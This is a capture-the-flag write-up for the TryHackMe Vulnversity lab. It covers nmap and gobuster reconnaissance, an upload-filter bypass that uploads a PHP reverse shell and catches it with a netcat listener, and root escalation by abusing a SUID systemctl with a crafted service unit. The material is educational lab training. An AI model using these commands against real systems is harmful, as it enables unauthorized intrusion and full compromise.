1 — OffSec Path — TryHackMe — Vulnversity
Learn about active recon, web app attacks, and privilege escalation.
Machine Information:
NMAP Cheat Sheet:
Reconnaissance
- Scan the box, how many ports are open?
sudo nmap -PS 10.10.213.40
-PS==TCP SYN/ACK, UDP or SCTP discovery to given ports.
2. What version of the squid proxy is running on the machine?
Note — squid proxy runs on port 3128 as shown on Port discovery scan.
sudo nmap -sV -p 3128 10.10.213.40
-sV ==Probe open ports to determine service/version info.
-p 312==Specifies scan on TCP port 3128.
3. How many ports will nmap scan if the flag -p-400 was used?
sudo nmap -p-400 10.10.213.40
-p-400 ==will scan top 400 ports
4. Using the nmap flag -n what will it not resolve?
nmap -h
5. What is the most likely operating system this machine is running?
sudo nmap -O -sV 10.10.213.40
-O == OS Scan
-sV ==Version scan
6. What port is the web server running on?
Locating directories using GoBuster
7. What is the directory that has an upload form page?
gobuster dir -u http://10.10.213.40:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 2>/dev/null
Compromise the webserver
8. Run this attack, what extension is allowed?
Test other extension files to determine what is allowed.
Values to test according to the Hints.
Only the .phtml extension does not contain the “Extension not allowed” error message.
Exploitation
Edit exploit and make it executable:
nano php-reverse-shell.phtml
chmod +x php-reverse-shell.phtml
Upload exploit to the target machine:
Setup a netcat listener on the attacker machine and execute exploit on the target machine:
nc -lvnp 4444
http://10.10.213.40:3333/internal/uploads/php-reverse-shell.phtml
And we got shell…
8. What is the name of the user who manages the webserver?
9. What is the user flag?
Privilege Escalation
10. On the system, search for all SUID files. What file stands out?
find / -perm -4000 2>/dev/null
Escalate privilege:
11.Become root and get the last flag (/root/root.txt)
nc -lvnp 4444 == setup a netcat listener on the attacker machine
First we create a variable which holds a unique file.
eop=$(mktemp).service
Then we create an unit file and write it into the variable.
echo ‘[Service]
ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output”
[Install]
WantedBy=multi-user.target’ > $eop
Inside the unit file we entered a command which will let shell execute the command cat and redirect the output of cat to a file called output in the folder tmp. And finally we use the /bin/systemctl program to enable the unit file.
/bin/systemctl link $eop
Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
/bin/systemctl enable — now $eop
Created symlink from /etc/systemd/system/multi user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
Let’s see if it worked….
ls -lah /tmp
cat /tmp/output
References:
